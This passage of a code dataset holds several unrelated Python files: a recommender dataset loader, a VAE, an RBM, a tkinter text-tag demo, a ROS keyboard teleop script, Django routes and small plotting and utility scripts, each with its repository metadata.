scratch.\n Initialize attributes firstly, then load data from atomic files, pre-process the dataset lastly.\n \"\"\"\n self.logger.info('Loading {} from scratch'.format(self.__class__))\n # get path\n file_path = os.path.join(self.dataset_path, '{}.inter'.format(self.dataset_name))\n if not os.path.isfile(file_path):\n raise ValueError('File {} not exist'.format(file_path))\n self.df = self._load_df_from_file(file_path, self.config['load_cols'])\n\n def _load_df_from_file(self, file_path, load_columns):\n # read header(user_id:token item_id:token rating:float timestamp:float) for ml-10k\n cnt = 0\n with open(file_path, 'r') as f:\n head = f.readline()[:-1]\n field_separator = self.config['field_separator']\n # only use [user_id, item_id, timestamp]\n for field_type in head.split(field_separator):\n if field_type in load_columns:\n cnt += 1\n # all cols exist\n if cnt != len(load_columns):\n raise ValueError('File {} lost some required columns.'.format(file_path))\n\n df = pd.read_csv(file_path, sep=self.config['field_separator'], usecols=load_columns)\n return df\n\n def _data_processing(self):\n \"\"\"Data preprocessing, including:\n - K-core data filtering\n - Remap ID\n \"\"\"\n # drop N/A value\n self.df.dropna(inplace=True)\n # remove duplicate rows\n self.df.drop_duplicates(inplace=True)\n # perform k-core\n self._filter_by_k_core(self.df)\n # remap ID\n self._reset_index(self.df)\n\n def _filter_by_k_core(self, df):\n \"\"\"Filter by number of interaction.\n\n Upper/Lower bounds can be set, only users/items between upper/lower bounds can be remained.\n See :doc:`../user_guide/data/data_args` for detail arg setting.\n\n Note:\n Lower bound is also called k-core filtering, which means this method will filter loops\n until all the users and items has at least k interactions.\n \"\"\"\n while True:\n ban_users = self._get_illegal_ids_by_inter_num(df, field=self.uid_field,\n max_num=self.config['max_user_inter_num'],\n min_num=self.config['min_user_inter_num'])\n ban_items = self._get_illegal_ids_by_inter_num(df, field=self.iid_field,\n max_num=self.config['max_item_inter_num'],\n min_num=self.config['min_item_inter_num'])\n\n if len(ban_users) == 0 and len(ban_items) == 0:\n return\n\n dropped_inter = pd.Series(False, index=df.index)\n if self.uid_field:\n dropped_inter |= df[self.uid_field].isin(ban_users)\n if self.iid_field:\n dropped_inter |= df[self.iid_field].isin(ban_items)\n # self.logger.info('[{}] dropped 
interactions'.format(len(dropped_inter)))\n df.drop(df.index[dropped_inter], inplace=True)\n\n def _get_illegal_ids_by_inter_num(self, df, field, max_num=None, min_num=None):\n \"\"\"Given inter feat, return illegal ids, whose inter num out of [min_num, max_num]\n\n Args:\n field (str): field name of user_id or item_id.\n feat (pandas.DataFrame): interaction feature.\n max_num (int, optional): max number of interaction. Defaults to ``None``.\n min_num (int, optional): min number of interaction. Defaults to ``None``.\n\n Returns:\n set: illegal ids, whose inter num out of [min_num, max_num]\n \"\"\"\n self.logger.debug('\\n get_illegal_ids_by_inter_num:\\n\\t field=[{}], max_num=[{}], min_num=[{}]'.format(\n field, max_num, min_num\n ))\n\n if field is None:\n return set()\n if max_num is None and min_num is None:\n return set()\n\n max_num = max_num or np.inf\n min_num = min_num or -1\n\n ids = df[field].values\n inter_num = Counter(ids)\n ids = {id_ for id_ in inter_num if inter_num[id_] < min_num or inter_num[id_] > max_num}\n\n self.logger.debug('[{}] illegal_ids_by_inter_num, field=[{}]'.format(len(ids), field))\n return ids\n\n def _reset_index(self, df):\n if df.empty:\n raise ValueError('Some feat is empty, please check the filtering settings.')\n df.reset_index(drop=True, inplace=True)\n\n def split(self, ratios):\n \"\"\"Split interaction records by ratios.\n\n Args:\n ratios (list): List of split ratios. No need to be normalized.\n group_by (str, optional): Field name that interaction records should grouped by after splitting.\n Defaults to ``None``\n\n Returns:\n list: List of :class:`~Dataset`, whose interaction features has been splitted.\n\n Note:\n Other than the first one, each part is rounded down.\n \"\"\"\n if self.preprocessed_loaded:\n dfs = []\n splitting_label = self.config['preprocessed_data_splitting']\n # splitting into training/validation/test\n for i in range(3):\n temp_df = self.df[self.df[splitting_label] == i].copy()\n temp_df.drop(splitting_label, inplace=True, axis=1)\n dfs.append(temp_df)\n # wrap as RecDataset\n full_ds = [self.copy(_) for _ in dfs]\n return full_ds\n\n tot_ratio = sum(ratios)\n # remove 0.0 in ratios\n ratios = [i for i in ratios if i > .0]\n ratios = [_ / tot_ratio for _ in ratios]\n\n # get split global time\n split_ratios = np.cumsum(ratios)[:-1]\n split_timestamps = list(np.quantile(self.df[self.ts_id], split_ratios))\n\n # get df training dataset unique users/items\n df_train = self.df.loc[self.df[self.ts_id] < split_timestamps[0]]\n self.logger.info('==Splitting: 1. Reindexing and filtering out new users/items not in train dataset...')\n\n uni_users = pd.unique(df_train[self.uid_field])\n uni_items = pd.unique(df_train[self.iid_field])\n # re_index users & items\n u_id_map = {k: i for i, k in enumerate(uni_users)}\n i_id_map = {k: i for i, k in enumerate(uni_items)}\n self.df[self.uid_field] = self.df[self.uid_field].map(u_id_map)\n self.df[self.iid_field] = self.df[self.iid_field].map(i_id_map)\n # filter out Nan line\n self.df.dropna(inplace=True)\n # as int\n self.df = self.df.astype(int)\n\n # split df based on global time\n self.logger.info('==Splitting: 2. Train/Valid/Test.')\n dfs = []\n start = 0\n for i in split_timestamps:\n dfs.append(self.df.loc[(start <= self.df[self.ts_id]) & (self.df[self.ts_id] < i)].copy())\n start = i\n # last\n dfs.append(self.df.loc[start <= self.df[self.ts_id]].copy())\n\n # save to disk\n self.logger.info('==Splitting: 3. 
Dumping...')\n self._save_dfs_to_disk(u_id_map, i_id_map, dfs)\n # self._drop_cols(dfs+[self.df], [self.ts_id])\n\n # wrap as RecDataset\n full_ds = [self.copy(_) for _ in dfs]\n return full_ds\n\n def _save_dfs_to_disk(self, u_map, i_map, dfs):\n if self.config['load_preprocessed'] and not self.preprocessed_loaded:\n dir_name = self.preprocessed_dataset_path\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n # save id mapping\n u_df = pd.DataFrame(list(u_map.items()), columns=[self.uid_field, 'new_id'])\n i_df = pd.DataFrame(list(i_map.items()), columns=[self.iid_field, 'new_id'])\n u_df.to_csv(os.path.join(self.preprocessed_dataset_path,\n '{}_u_{}_mapping.csv'.format(self.dataset_name, self.ui_core_splitting_str)),\n sep=self.config['field_separator'], index=False)\n i_df.to_csv(os.path.join(self.preprocessed_dataset_path,\n '{}_i_{}_mapping.csv'.format(self.dataset_name, self.ui_core_splitting_str)),\n sep=self.config['field_separator'], index=False)\n # 0-training/1-validation/2-test\n for i, temp_df in enumerate(dfs):\n temp_df[self.config['preprocessed_data_splitting']] = i\n temp_df = pd.concat(dfs)\n temp_df.to_csv(os.path.join(self.preprocessed_dataset_path, self.processed_data_name),\n sep=self.config['field_separator'], index=False)\n self.logger.info('\\nData saved to preprocessed dir: \\n' + self.preprocessed_dataset_path)\n\n # def _drop_cols(self, dfs, col_names):\n # for _df in dfs:\n # _df.drop(col_names, inplace=True, axis = 1)\n\n def copy(self, new_df):\n \"\"\"Given a new interaction feature, return a new :class:`Dataset` object,\n whose interaction feature is updated with ``new_df``, and all the other attributes the same.\n\n Args:\n new_df (pandas.DataFrame): The new interaction feature need to be updated.\n\n Returns:\n :class:`~Dataset`: the new :class:`~Dataset` object, whose interaction feature has been updated.\n \"\"\"\n nxt = RecDataset(self.config, new_df)\n return nxt\n\n def num(self, field):\n \"\"\"Given ``field``, for token-like fields, return the number of different tokens after remapping,\n for float-like fields, return ``1``.\n\n Args:\n field (str): field name to get token number.\n\n Returns:\n int: The number of different tokens (``1`` if ``field`` is a float-like field).\n \"\"\"\n if field not in self.config['load_cols']:\n raise ValueError('field [{}] not defined in dataset'.format(field))\n uni_len = len(pd.unique(self.df[field]))\n return uni_len\n\n def shuffle(self):\n \"\"\"Shuffle the interaction records inplace.\n \"\"\"\n self.df = self.df.sample(frac=1, replace=False).reset_index(drop=True)\n\n def sort_by_chronological(self):\n self.df.sort_values(by=[self.ts_id], inplace=True, ignore_index=True)\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n # Series result\n return self.df.iloc[idx]\n\n def __repr__(self):\n return self.__str__()\n\n def __str__(self):\n info = [self.dataset_name]\n self.inter_num = len(self.df)\n uni_u = pd.unique(self.df[self.uid_field])\n uni_i = pd.unique(self.df[self.iid_field])\n if self.uid_field:\n self.user_num = len(uni_u)\n self.avg_actions_of_users = self.inter_num/self.user_num\n info.extend(['The number of users: {}'.format(self.user_num),\n 'Average actions of users: {}'.format(self.avg_actions_of_users)])\n if self.iid_field:\n self.item_num = len(uni_i)\n self.avg_actions_of_items = self.inter_num/self.item_num\n info.extend(['The number of items: {}'.format(self.item_num),\n 'Average actions of items: {}'.format(self.avg_actions_of_items)])\n 
info.append('The number of inters: {}'.format(self.inter_num))\n if self.uid_field and self.iid_field:\n sparsity = 1 - self.inter_num / self.user_num / self.item_num\n info.append('The sparsity of the dataset: {}%'.format(sparsity * 100))\n return '\\n'.join(info)\n","repo_name":"enoche/ImRec","sub_path":"utils/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":14272,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"4"} +{"seq_id":"32126875440","text":"import numpy as np\nfrom ballet import Feature\nfrom ballet.eng import SimpleFunctionTransformer\n\ninput = ['Lot Area', 'Lot Frontage']\ndef fill_frontage(df):\n mask = df['Lot Frontage'].isnull()\n df['Lot Frontage'][mask] = np.sqrt(df['Lot Area'])[mask]\n return df['Lot Frontage']\ntransformer = SimpleFunctionTransformer(fill_frontage)\nname = 'Lot Frontage Fill'\nfeature = Feature(input=input, transformer=transformer, name=name)\n","repo_name":"micahjsmith/ballet-ames-notebooks","sub_path":"features/user_08/feature_02.py","file_name":"feature_02.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"31948321157","text":"import math\nimport matplotlib.pyplot as plt\n\n\ndef plot(x: list, y: list, x_new: list, y_new: list):\n plt.scatter(x, y, c='red')\n plt.scatter(x_new, y_new, c='blue')\n plt.legend(['old point', 'new point'])\n\n plt.axhline(0, c='gray')\n plt.axvline(0, c='gray')\n\n max_val = max(x + y + x_new + y_new) + 1\n min_val = min(x + y + x_new + y_new) - 1\n min_val = min(min_val, 0)\n\n plt.ylim((min_val, max_val))\n plt.xlim((min_val, max_val))\n plt.xlabel('x - axis')\n plt.ylabel('y - axis')\n plt.title('Point Transformation')\n plt.show()\n\n\ndef translate(x: int, y: int, tx: int, ty: int):\n x_new = [x + tx]\n y_new = [y + ty]\n plot([x], [y], x_new, y_new)\n\n\ndef scale(x: int, y: int, sx: float, sy: float):\n x_new = [x * sx]\n y_new = [y * sy]\n plot([x], [y], x_new, y_new)\n\n\ndef rotate(x: int, y: int, angle: float):\n x_new = [x * math.cos(angle) - y * math.sin(angle)]\n y_new = [x * math.sin(angle) + y * math.cos(angle)]\n plot([x], [y], x_new, y_new)\n\n\nx = int(input('Enter x: '))\ny = int(input('Enter y: '))\n\nprint('1. Translation\\n2. Scaling\\n3. Rotation')\nchoice = int(input('Enter a choice: '))\n\nassert (choice >= 1 and choice <= 3)\n\nif choice == 1:\n tx = int(input('Enter tx: '))\n ty = int(input('Enter ty: '))\n translate(x, y, tx, ty)\nelif choice == 2:\n sx = float(input('Enter sx: '))\n sy = float(input('Enter sy: '))\n scale(x, y, sx, sy)\nelse:\n angle = int(input('Enter theta in degrees: '))\n angle = (angle * math.pi) / 180\n rotate(x, y, angle)\n","repo_name":"rohitmalik776/cg-lab-dtu","sub_path":"point_transformations.py","file_name":"point_transformations.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"29852448071","text":"from pms.models import Notification\nfrom django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n\tpath('', views.IndexView, name = \"index\"),\n\tpath('home/', views.HomeView, name = \"home\"),\n\tpath('createproject/', views.CreateProjectView, name = \"createproject\"),\n\tpath('projects/', views.ProjectsView, name = \"projects\"),\n\tpath('projects//', views.ProjectDetailsView, name = \"projectdetails\"),\n\tpath('projects/addnewlevel//', views.AddNewLevelView, name = \"addnewlevel\"),\n\tpath('projects/moveproject///', views.MoveProjectView, name = \"moveproject\"),\n\tpath('projects/changedetails//', views.ChangeProjectDetailsView, name = \"changedetails\"),\n\tpath('projects/addworker///', views.AddWorkersView, name = \"addworker\"),\n\tpath('projects/relieveworker///', views.RelieveFromProjectView, name = \"relieveworker\"),\n\tpath('notifications/', views.NotificationsView, name = \"notifications\"),\n\tpath('notifications/markasread//', views.NotificationMarkAsReadView, name = \"markasread\"),\n\n\n\t# AUTHENTICATION\n\tpath('login/', views.LoginView, name = \"login\"),\n\tpath('logout/', views.LogoutView, name = \"logout\"),\n\tpath('register/', views.RegisterView, name = \"register\"),\n]\n","repo_name":"j-yeskay/pms-django","sub_path":"pms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"20246390819","text":"#!/usr/bin/env python\n\nimport rospy\nfrom race.msg import drive_param\nimport curses\n#import signal\n#TIMEOUT = 0.1 # number of seconds your want for timeout\nforward = 0;\nleft = 0;\n\n# def interrupted(signum, frame):\n# \"called when read times out\"\n# global forward\n# forward = 0\n# global left\n# left = 0\n# stdscr.addstr(2, 20, \"Stop\")\n# stdscr.addstr(2, 25, '%.2f' % forward)\n# stdscr.addstr(3, 20, \"Stop\")\n# stdscr.addstr(3, 25, '%.2f' % left)\n# signal.signal(signal.SIGALRM, interrupted)\n\n# def input():\n# try:\n# foo = stdscr.getch()\n# return foo\n# except:\n# # timeout\n# return\n\nstdscr = curses.initscr()\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyboard_talker')\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)\n\n# set alarm\n#signal.alarm(TIMEOUT)\n#s = input()\n# disable the alarm after success\n#signal.alarm(0)\n#print 'You typed', s\n\nstdscr.refresh()\n\nkey = ''\nwhile key != ord('q'):\n#\tsignal.setitimer(signal.ITIMER_REAL,0.05)\n#\tkey = input()\n\tkey = stdscr.getch()\n\tstdscr.refresh()\n#\tsignal.alarm(0)\n\tif key == curses.KEY_UP: \n\t\tforward = forward + 1;\n\t\tstdscr.addstr(2, 20, \"Up \")\n\t\tstdscr.addstr(2, 25, '%.2f' % forward)\n\t\tstdscr.addstr(5, 20, \" \")\n\telif key == curses.KEY_DOWN:\n\t\tforward = forward - 1; \n\t\tstdscr.addstr(2, 20, \"Down\")\n\t\tstdscr.addstr(2, 25, '%.2f' % forward)\n\t\tstdscr.addstr(5, 20, \" \")\n\tif key == curses.KEY_LEFT:\n\t\tleft = left - 1; \n\t\tstdscr.addstr(3, 20, \"left\")\n\t\tstdscr.addstr(3, 25, '%.2f' % left)\n\t\tstdscr.addstr(5, 20, \" \")\n\telif key == curses.KEY_RIGHT:\n\t\tleft = left + 1; \n\t\tstdscr.addstr(3, 20, \"rgt \")\n\t\tstdscr.addstr(3, 25, '%.2f' % left)\n\t\tstdscr.addstr(5, 20, \" \")\n\tif key == curses.KEY_DC:\n\t\tleft = 0\n\t\tforward = 0\n\t\tstdscr.addstr(5, 20, \"Stop\")\n\tmsg = drive_param()\n\tmsg.velocity = forward\n\tmsg.angle = 
left\n\tpub.publish(msg)\ncurses.endwin()\n","repo_name":"f1tenth/F110CPSWeek2018","sub_path":"Unimore/drivebox-tenth/src/f1tenth/race/src/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"4"} +{"seq_id":"29353905081","text":"import csv\n\ndef new_user():\n    # read the existing users (if any) so the next id can be computed\n    try:\n        with open(\"user.csv\", \"r\", newline=\"\") as f:\n            read = csv.reader(f)\n            user = [i for i in read]\n    except FileNotFoundError:\n        user = []\n\n    for i in user:\n        print(i)\n\n    if user:\n        id = int(user[-1][0]) + 1\n    else:\n        id = 0\n\n    nam = input(\"Enter name: \")\n\n    score = 0\n\n    n_user = [id, nam, score]\n\n    with open('user.csv', 'a', newline='') as f:\n        write = csv.writer(f)\n        write.writerow(n_user)\n\nnew_user()","repo_name":"DarkGamer1507/Project","sub_path":"quiz/main_menu.py/new_user.py","file_name":"new_user.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"70458831797","text":"from unittest import TestCase\nfrom parameterized import parameterized\nfrom TattooSalon.salon.validator import Validator\n\nclass TestValidatorTDD(TestCase):\n\n    @parameterized.expand([\n        [\"Кристина123\", True],\n        [\"kristina@gmail.com\", True],\n        [\"+34567567kris\", True],\n        [\"main_admin\", True],\n        [\"super-admin\", True],\n        [\"#Admin123\", True],\n        [\"Костя%1%1%\", True],\n        [\"1*2*3*4\", True],\n        [\"kristina/Mironenko\", True],\n        [\"\", False],\n    ])\n    def test_check_login(self, input_string, expected):\n\n        actual = Validator.check_login(input_string)\n\n        self.assertEqual(actual, expected)\n\n\nclass TestIntegrated(TestCase):\n\n    def test_addToCart_AddToCart_DeleteFromCart_ExceptedTrue(self):\n        self.assertEqual(True, True)\n    def test_CheckOnValidLoginAndValidPasswordExceptTrue(self):\n        self.assertEqual(True, True)","repo_name":"xlebyshek17/TattoSalon","sub_path":"TattooSalon/salon/tests/test_tdd.py","file_name":"test_tdd.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"37848335882","text":"import matplotlib.pyplot as plt\nf = open('mouse.csv', 'r').read()\ndatasets = f.split('\\n')\n# get 4 corners \nfor i in range(6,len(datasets)- 2,2):\n    ydata = datasets[i].split(',')\n    ylabel = ydata[0]\n    y = list(map(float, ydata[1:]))\n    \n    i = i + 1\n    \n    xdata = datasets[i].split(',')\n    xlabel = xdata[0]\n    x = list(map(float, xdata[1:]))\n    line, = plt.plot(x,y, color='g')\n    line.set_label(ylabel)\n\n    if \"Bottom Right\" in ylabel:\n        peaks = []\n        threshold= -0.7\n        ind = 0\n        for j in range(len(y)):\n            if y[j] > threshold:\n                print(x[j], y[j])\n                peaks.append(x[j])\n    \n    \nmouse_data = datasets[len(datasets)-2].split(',')\nmouse_label = mouse_data[0]\nmouse_timestamps = list(map(float, mouse_data[1:]))\nplt.axhline(threshold, color = 'r', label = \"Threshold\")\ndistances = []\nimport math\nmouse_label_added = False\nfor m in mouse_timestamps:\n    d = 10000\n    r_d = 0\n    for p in peaks:\n        _d = math.sqrt((m -p)**2)\n        if d > _d:\n            d = _d\n            r_d = p-m\n    distances.append(r_d)\n    if mouse_label_added:\n        plt.axvline(m)\n    else:\n        plt.axvline(m, label = mouse_label)\n        mouse_label_added = True\n\nplt.legend()\nprint(distances)\nm = sum(distances)/len(distances)\ndeviations = list(map(lambda x : (x - m) **2, distances))\nprint(deviations)\nstd = math.sqrt(sum(deviations)/len(deviations))\nprint(m, std)#-36.61435555749055 
16.73778306287719\nplt.show()\n\n\n\n","repo_name":"colonbrack3t/Final-Year-Project","sub_path":"VR Balance Board Calibration project/Assets/BalanceBoard/plot_mouse.py","file_name":"plot_mouse.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"33721663376","text":"import torch\nimport torch.nn as nn\n\n# updated VAE code: the change is that mu and logvar are now produced by two separate network branches\nclass VAE_new(nn.Module):\n    def __init__(self):\n        super(VAE_new, self).__init__()\n        self.fc1 = nn.Linear(784,256)\n        self.fc2 = nn.Linear(256,64)\n        self.fc31 = nn.Linear(64,10)\n        self.fc32 = nn.Linear(64,10)\n        self.relu = nn.ReLU()\n        self.decoder = nn.Sequential(\n            nn.Linear(10,64),\n            nn.ReLU(),\n            nn.Linear(64,256),\n            nn.ReLU(),\n            nn.Linear(256,784),\n            nn.Sigmoid()\n        )\n\n    def encoder(self,x):\n        h1 = self.relu(self.fc1(x))\n        h2 = self.relu(self.fc2(h1))\n\n        return self.relu(self.fc31(h2)),self.relu(self.fc32(h2))\n\n    def reparamtrize(self,mu,logvar):\n        return mu + logvar * torch.randn_like(logvar)\n\n    def forward(self,x):\n        batch_size = x.size(0)\n        # flatten\n        x = x.view(batch_size,784)\n        mu,logvar = self.encoder(x)\n        h_ = self.reparamtrize(mu,logvar)\n        x_hat = self.decoder(h_)\n        x_hat = x_hat.view(batch_size,1,28,28)\n\n        # KL divergence\n        # since the distribution we want to approximate is N~(0,1), mu2 = 0 and sigma2 = 1\n        kld = 0.5 * torch.sum(\n            torch.pow(mu, 2) +\n            torch.pow(logvar, 2) -\n            torch.log(1e-8 + torch.pow(logvar, 2)) - 1\n        ) / (batch_size * 28 * 28)\n\n        return x_hat,kld\n\n\n\n","repo_name":"sjt5285126/GridVGAE_system","sub_path":"autocoder/vae_update.py","file_name":"vae_update.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17166870690","text":"import tkinter as tk\n\nclass Tag(tk.Tk):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.title(\"Tags\")\n\t\tself.text = tk.Text(self)\n\t\tself.text.pack(side=tk.TOP,fill='y')\n\t\t\n\t\tself.text.bind('',self.configuring_tags,'')# the empty string option means that the function should replace any other binding of the same shortcut key\n\n\t\tself.text.bind('',self.raise_selected)\n\t\tself.text.bind('',self.underline_selected)\n\t\tself.text.bind('',self.duplicate_text)\n\n\t\tself.text.bind('',self.search_word)\n\t\t\n\n\tdef configuring_tags(self,event = None):\n\t\tlineend = self.text.index(tk.INSERT)\n\t\tlineend = lineend.split('.')\n\t\tlineend = int(lineend[1])\n\t\tfor i in range(lineend):\n\t\t\tindex = '1.'+str(i)\n\t\t\tend= '1.end'\n\t\t\tself.text.tag_add('even',index,end)# args are: call tag,start_point of the tag, end point of the tag\n\t\tself.text.tag_configure('even',foreground= 'green')# args are: create tag,what the tag should affect \n\n\tdef raise_selected(self,event=None):\n\t\t\n\t\tselected_pos = self.text.tag_ranges('sel')# the range of the selection you made. returns a list of elements: starting index and ending index of the selected area\n\n\t\ttry:\n\t\t\tself.text.tag_add('raise',selected_pos[0],selected_pos[1])\n\t\texcept:# to prevent an error in case there is no selected area\n\t\t\tpass \n\t\tself.text.tag_configure('raise',offset=5)# the offset raises the selected text\n\n\t\treturn 'break' # overwrites any default event of the selected shortcut key\n\tdef underline_selected(self,event=None):\n\t\tself.text.tag_configure('underline',underline=1)\n\t\tselected_pos = self.text.tag_ranges('sel')# the range of the selection you made. 
returns a list of elements: starting index and ending index of the selected area\n\n\t\ttry:\n\t\t\tself.text.tag_add('underline',selected_pos[0],selected_pos[1])\n\t\texcept:\n\t\t\tpass\n\t\t\n\n\t\treturn 'break' # overwrites any default event of the selected shorcut key\n\n\t# duplicating a text\n\tdef duplicate_text(self,event):\n\t\tcursor_pos = self.text.index(tk.INSERT)\n\t\tcursor_pos = cursor_pos.split('.')\n\t\t\n\t\tselected_area = self.text.tag_ranges('sel')\n\t\tnew_pos = str(selected_area[1])\n\t\t\n\t\tnew_pos = new_pos.split('.')\n\t\t\n\t\tnew_pos = str(int(new_pos[0])+1)+'.0'\n\t\t\n\n\t\ttext_copy = self.text.get(selected_area[0],selected_area[1]) # returns the text within this indexes\n\t\t\n\n\t\tself.text.insert(new_pos,'\\n'+text_copy)\n\t\treturn 'break'\n\n\tdef search_word(self,event):\n\t\tself.text.tag_configure('color',foreground='purple')\n\t\tstart = 1.0\n\t\tidx = self.text.search('python',start,stopindex=tk.END)\n\t\twhile idx:\n\t\t\ttag_begin = idx\n\t\t\ttag_end = f'{idx}+6c'\n\t\t\tself.text.tag_add('color',tag_begin,tag_end)\n\n\t\t\tstart = tag_end\n\t\t\tidx = self.text.search('python',start,stopindex = tk.END)\n\n\n\t\nif __name__ == '__main__':\n\ttag = Tag()\n\ttag.mainloop()\n","repo_name":"jaykayudo/Flotex","sub_path":"demos/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"9888255306","text":"'''\nRestricted Boltzmann Machines\n'''\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.eager as tfe\nfrom utils import sample_from_bernoulli, tf_xavier_init\n\n\nclass RBM():\n\n def __init__(self, vis_dim, hid_dim, w=None, vis_b=None, hid_b=None):\n self.vis_dim = vis_dim\n self.hid_dim = hid_dim\n if w is not None:\n self.w = w\n else:\n self.w = tfe.Variable(\n tf_xavier_init(self.vis_dim, self.hid_dim, const=4.0),\n name='rbm.w')\n if hid_b is not None:\n self.hid_b = hid_b\n else:\n self.hid_b = tfe.Variable(\n tf.zeros([self.hid_dim]), dtype=tf.float32, name='rbm.hid_b')\n if vis_b is not None:\n self.vis_b = vis_b\n else:\n self.vis_b = tfe.Variable(\n tf.zeros([self.vis_dim]), dtype=tf.float32, name='rbm.vis_b')\n\n # conditional distributions\n def vis2hid(self, v):\n return tf.nn.sigmoid(tf.matmul(v, self.w) + self.hid_b)\n\n def hid2vis(self, h):\n return tf.nn.sigmoid(tf.matmul(h, tf.transpose(self.w)) + self.vis_b)\n\n # Gibbs steps\n def gibbs_vhv(self, v_0):\n h_1 = sample_from_bernoulli(self.vis2hid(v_0))\n v_1 = sample_from_bernoulli(self.hid2vis(h_1))\n return h_1, v_1\n\n def gibbs_hvh(self, h_0):\n v_1 = sample_from_bernoulli(self.hid2vis(h_0))\n h_1 = sample_from_bernoulli(self.vis2hid(v_1))\n return v_1, h_1\n\n # marginalization\n def ulogprob_vis(self, v):\n wx_b = tf.matmul(v, self.w) + self.hid_b\n vbias_term = tf.einsum('ij,j->i', v, self.vis_b)\n hidden_term = tf.reduce_sum(tf.nn.softplus(wx_b), axis=1)\n return hidden_term + vbias_term\n\n def ulogprob_hid(self, h):\n wx_b = tf.matmul(h, tf.transpose(self.w)) + self.vis_b\n hbias_term = tf.einsum('ij,j->i', h, self.hid_b)\n vis_term = tf.reduce_sum(tf.nn.softplus(wx_b), axis=1)\n return vis_term + hbias_term\n\n # log partiation function\n def log_z_summing_h(self):\n assert (self.hid_dim <= 20)\n h_all = np.arange(2**self.hid_dim, dtype=np.int32)\n h_all = ((h_all.reshape(-1, 1) &\n (2**np.arange(self.hid_dim))) != 0).astype(np.float32)\n h_all = tf.constant(h_all[:, ::-1], dtype=tf.float32)\n log_p_h = 
self.ulogprob_hid(h_all)\n log_z = tf.reduce_logsumexp(log_p_h, axis=0)\n return log_z\n\n def log_z_summing_v(self):\n assert (self.vis_dim <= 20)\n v_all = np.arange(2**self.vis_dim, dtype=np.int32)\n v_all = ((v_all.reshape(-1, 1) &\n (2**np.arange(self.vis_dim))) != 0).astype(np.float32)\n v_all = tf.constant(v_all[:, ::-1], dtype=tf.float32)\n log_p_v = self.ulogprob_vis(v_all)\n log_z = tf.reduce_logsumexp(log_p_v, axis=0)\n return log_z\n\n # likelihood\n def logprob_vis(self, v, log_z):\n return self.ulogprob_vis(v) - log_z\n\n def logprob_hid(self, h, log_z):\n return self.ulogprob_hid(h) - log_z\n\n # energy function\n def energy(self, h, v):\n hbias_term = tf.einsum('ij,j->i', h, self.hid_b)\n vbias_term = tf.einsum('ij,j->i', v, self.vis_b)\n weight_term = tf.reduce_sum(tf.matmul(v, self.w) * h, axis=1)\n return -(hbias_term + vbias_term + weight_term)\n\n # free energy\n def free_energy(self, v):\n return -self.ulogprob_vis(v)\n\n # free energy for debug\n def _debug_free_energy(self, v):\n assert (self.hid_dim <= 20)\n assert (v.numpy().shape == (1, self.vis_dim))\n\n h_all = np.arange(2**self.hid_dim, dtype=np.int32)\n h_all = ((h_all.reshape(-1, 1) &\n (2**np.arange(self.hid_dim))) != 0).astype(np.float32)\n h_all = tf.constant(h_all[:, ::-1], dtype=tf.float32)\n v_dup = tf.tile(v, [2**self.hid_dim, 1])\n return -tf.reduce_logsumexp(-self.energy(h_all, v), axis=0)\n\n # get samples\n def get_h_from_v(self, v, burn_in_steps=100):\n for i in xrange(burn_in_steps):\n h, v = self.gibbs_vhv(v)\n return h.numpy()\n\n def get_h(self, num_samples, burn_in_steps=1000, random=True):\n v = tf.zeros([num_samples, self.vis_dim], dtype=tf.float32)\n if random:\n v = sample_from_bernoulli(v + 0.5) # data average\n for i in xrange(burn_in_steps):\n h, v = self.gibbs_vhv(v)\n return h.numpy()\n\n def get_independent_samples(self,\n num_samples,\n burn_in_steps=100000,\n random=True,\n initial_v=None):\n if initial_v is not None:\n v = initial_v\n else:\n v = tf.zeros([num_samples, self.vis_dim], dtype=tf.float32)\n if random:\n v = sample_from_bernoulli(v + 0.2) # data average\n\n for i in xrange(burn_in_steps):\n _, v = self.gibbs_vhv(v)\n return v.numpy()\n\n def get_independent_means(self,\n num_samples,\n burn_in_steps=100000,\n random=True):\n v = tf.zeros([num_samples, self.vis_dim], dtype=tf.float32)\n if random:\n v = sample_from_bernoulli(v + 0.2) # data average\n for i in xrange(burn_in_steps):\n _, v = self.gibbs_vhv(v)\n h_1 = sample_from_bernoulli(self.vis2hid(v))\n v_1 = self.hid2vis(h_1)\n return v_1.numpy()\n\n def get_samples_single_chain(self,\n num_samples,\n adjacent_samples=10,\n steps_between_samples=1000,\n burn_in_steps=100000,\n random=True):\n assert num_samples % adjacent_samples == 0\n v = tf.zeros([1, self.vis_dim], dtype=tf.float32)\n if random:\n v = sample_from_bernoulli(v + 0.2) # data average\n for i in xrange(burn_in_steps):\n _, v = self.gibbs_vhv(v)\n sample_list = []\n for i in xrange(num_samples / adjacent_samples):\n for j in xrange(adjacent_samples):\n _, v = self.gibbs_vhv(v)\n 